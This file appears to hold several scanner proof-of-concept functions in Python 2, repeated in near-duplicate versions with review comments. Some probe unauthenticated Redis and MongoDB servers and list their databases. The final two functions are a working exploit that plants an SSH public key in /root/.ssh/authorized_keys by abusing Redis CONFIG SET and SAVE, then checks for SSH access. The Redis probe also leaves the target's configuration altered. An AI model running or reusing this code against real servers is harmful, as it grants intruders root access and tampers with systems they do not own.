def poc(url):
    """Probe a Redis instance for unauthenticated, writable access.

    Only hosts that also answer on one of the web ports below are
    considered; the resolved web URL is computed but never returned
    (see the TODO).

    Returns:
        False when no web port is open, when INFO lacks ``redis_version``
        or when any Redis call raises.  The success path has no explicit
        return, so the caller receives ``None``.

    Side effects on the target: a throwaway key is set and deleted, and
    ``dir``/``dbfilename`` are changed to ``/root/`` / ``dump.rdb`` and
    not restored before SAVE writes that file.
    """
    url = host2IP(url)  # presumably returns "ip[:port]" — verify against the helper
    ip = url.split(':')[0]
    # Explicit port after the colon, otherwise the Redis default.
    port = int(url.split(':')[-1]) if ':' in url else 6379
    for web_port in [80, 443, 8080, 8443]:  # check for a web service
        if checkPortTcp(ip, web_port):
            try:
                real_url = redirectURL(ip + ':' + str(web_port))
            except Exception:
                # Fall back to the raw host:port if redirect resolution fails.
                real_url = ip + ':' + str(web_port)
            # NOTE: real_url is not used after this loop.
            break  # TODO simplified handling: only the first open web port is considered
    else:
        # for/else: no web port was open.
        return False
    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
        # INFO answering with redis_version means the server replied without
        # credentials (an auth-protected server presumably raises here and is
        # caught below — verify).
        if 'redis_version' not in r.info():  # check unauthenticated access
            return False
        key = randomString(5)
        value = randomString(5)
        r.set(key, value)  # check that keys are writable
        # NOTE(review): neither config value is restored afterwards; the target is
        # left with dir=/root/, and SAVE below creates /root/dump.rdb there.
        r.config_set('dir', '/root/')  # check write access to /var/www (currently checks /root instead)
        r.config_set('dbfilename', 'dump.rdb')  # check CONFIG permission
        r.delete(key)
        r.save()  # check that a dump can be written
    except Exception, e:  # Python 2 syntax; `e` is unused
        return False
def poc(url):
    """Probe a Redis instance for unauthenticated, writable access.

    Only hosts that also answer on one of the web ports below are
    considered; the resolved web URL is computed but never returned
    (see the TODO).

    Returns:
        False when no web port is open, when INFO lacks ``redis_version``
        or when any Redis call raises.  The success path has no explicit
        return, so the caller receives ``None``.

    Side effects on the target: a throwaway key is set and deleted, and
    ``dir``/``dbfilename`` are changed to ``/root/`` / ``dump.rdb`` and
    not restored before SAVE writes that file.
    """
    url = host2IP(url)  # presumably returns "ip[:port]" — verify against the helper
    ip = url.split(":")[0]
    # Explicit port after the colon, otherwise the Redis default.
    port = int(url.split(":")[-1]) if ":" in url else 6379
    for web_port in [80, 443, 8080, 8443]:  # check for a web service
        if checkPortTcp(ip, web_port):
            try:
                real_url = redirectURL(ip + ":" + str(web_port))
            except Exception:
                # Fall back to the raw host:port if redirect resolution fails.
                real_url = ip + ":" + str(web_port)
            # NOTE: real_url is not used after this loop.
            break  # TODO simplified handling: only the first open web port is considered
    else:
        # for/else: no web port was open.
        return False
    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
        # INFO answering with redis_version means the server replied without
        # credentials (an auth-protected server presumably raises here and is
        # caught below — verify).
        if "redis_version" not in r.info():  # check unauthenticated access
            return False
        key = randomString(5)
        value = randomString(5)
        r.set(key, value)  # check that keys are writable
        # NOTE(review): neither config value is restored afterwards; the target is
        # left with dir=/root/, and SAVE below creates /root/dump.rdb there.
        r.config_set("dir", "/root/")  # check write access to /var/www (currently checks /root instead)
        r.config_set("dbfilename", "dump.rdb")  # check CONFIG permission
        r.delete(key)
        r.save()  # check that a dump can be written
    except Exception, e:  # Python 2 syntax; `e` is unused
        return False
def poc(url):
    """Report a host whose MongoDB port (27017) accepts a connection.

    Returns:
        The IP string when ``testConnect`` succeeds; False when the port
        is closed or an exception is raised; ``None`` (implicit) when the
        port is open but ``testConnect`` returns a falsy value.
    """
    url = host2IP(url)  # presumably returns "ip[:port]" — verify against the helper
    ip = url.split(':')[0]  # any port in url is ignored; 27017 is hard-coded below
    try:
        if not checkPortTcp(ip,27017):
            return False
        if testConnect(ip,27017):  # what testConnect verifies is not visible here
            return ip
    except Exception,e:  # Python 2 syntax; `e` is unused
        return False
def poc(url):
    """List database names from a MongoDB server reachable without credentials.

    Returns:
        ``"<ip> -> db1|db2|..."`` when at least one database name is
        returned; False when the port is closed, the name list is empty,
        or any exception is raised.
    """
    ip = host2IP(url).split(':')[0]
    port = 27017  # MongoDB default; any port in url is ignored
    try:
        if not checkPortTcp(ip, port):
            return False
        # Client is built with no credentials, so a successful listing means the
        # server allowed listDatabases to an unauthenticated connection.
        conn = pymongo.MongoClient(ip, port, socketTimeoutMS=3000)
        # NOTE(review): conn is never closed; the connection lingers until GC.
        # database_names() is a legacy pymongo API (list_database_names() is the
        # successor) — verify against the installed version.
        dbs = conn.database_names()
        # The conditional expression covers the whole value: False when dbs is empty.
        return ip + ' -> ' + '|'.join(dbs) if dbs else False
    except Exception:
        return False
def poc(url):
    """Write ``public_key`` into /root/.ssh/authorized_keys through Redis SAVE, then test SSH.

    Requires an open port 22 and a Redis that answers INFO without
    credentials; the write itself presumably succeeds only when the
    redis process can create files under /root/.ssh.

    Returns:
        True when ``testConnect(ip, 22)`` succeeds afterwards; False when
        port 22 is closed or any exception is raised; ``None`` (implicit)
        otherwise.

    Side effects on the target that are NOT reverted: ``dir`` ends at
    ``/tmp`` rather than its original value, ``dbfilename`` stays
    ``authorized_keys``, and the file SAVE wrote is left in place —
    ``delete()`` removes only the Redis key.  Those config values and
    an authorized_keys file containing the key are the artifacts a
    responder would look for.
    """
    url = host2IP(url)  # presumably returns "ip[:port]" — verify against the helper
    ip = url.split(':')[0]
    # Explicit port after the colon, otherwise the Redis default.
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        if not checkPortTcp(ip, 22):
            return False
        r = redis.Redis(host=ip, port=port, db=0)  # no socket_timeout: calls may block
        if 'redis_version' in r.info():  # INFO succeeded => no auth required
            key = randomString(10)
            # public_key is not defined in this function; presumably a module-level value.
            r.set(key, '\n\n' + public_key + '\n\n')
            r.config_set('dir', '/root/.ssh')
            r.config_set('dbfilename', 'authorized_keys')
            r.save()  # writes the dump to /root/.ssh/authorized_keys
            r.delete(key)  # remove the temporary key (original comment: "clean up traces")
            r.config_set('dir', '/tmp')  # not the original dir; dbfilename is not reset
            time.sleep(5)  # presumably waits for the write to land before testing SSH
            if testConnect(ip, 22):  # what testConnect verifies is not visible here
                return True
    except Exception, e:  # Python 2 syntax; `e` is unused
        # print e
        return False
def poc(url):
    """Write ``public_key`` into /root/.ssh/authorized_keys through Redis SAVE, then test SSH.

    Requires an open port 22 and a Redis that answers INFO without
    credentials; the write itself presumably succeeds only when the
    redis process can create files under /root/.ssh.

    Returns:
        True when ``testConnect(ip, 22)`` succeeds afterwards; False in
        every other case (port 22 closed, exception raised, INFO without
        ``redis_version``, or ``testConnect`` failing).

    Side effects on the target that are NOT reverted: ``dir`` ends at
    ``/tmp`` rather than its original value, ``dbfilename`` stays
    ``authorized_keys``, and the file SAVE wrote is left in place —
    ``delete()`` removes only the Redis key.  Those config values and
    an authorized_keys file containing the key are the artifacts a
    responder would look for.
    """
    url = host2IP(url)  # presumably returns "ip[:port]" — verify against the helper
    ip = url.split(':')[0]
    # Explicit port after the colon, otherwise the Redis default.
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        if not checkPortTcp(ip, 22):
            return False
        r = redis.Redis(host=ip, port=port, db=0)  # no socket_timeout: calls may block
        if 'redis_version' in r.info():  # INFO succeeded => no auth required
            key = randomString(10)
            # public_key is not defined in this function; presumably a module-level value.
            r.set(key, '\n\n' + public_key + '\n\n')
            r.config_set('dir', '/root/.ssh')
            r.config_set('dbfilename', 'authorized_keys')
            r.save()  # writes the dump to /root/.ssh/authorized_keys
            r.delete(key)  # remove the temporary key (original comment: "clean up traces")
            r.config_set('dir', '/tmp')  # not the original dir; dbfilename is not reset
            time.sleep(5)  # presumably waits for the write to land before testing SSH
            if testConnect(ip, 22):  # what testConnect verifies is not visible here
                return True
    except Exception:
        return False
    # Reached when INFO lacked redis_version or testConnect was falsy.
    return False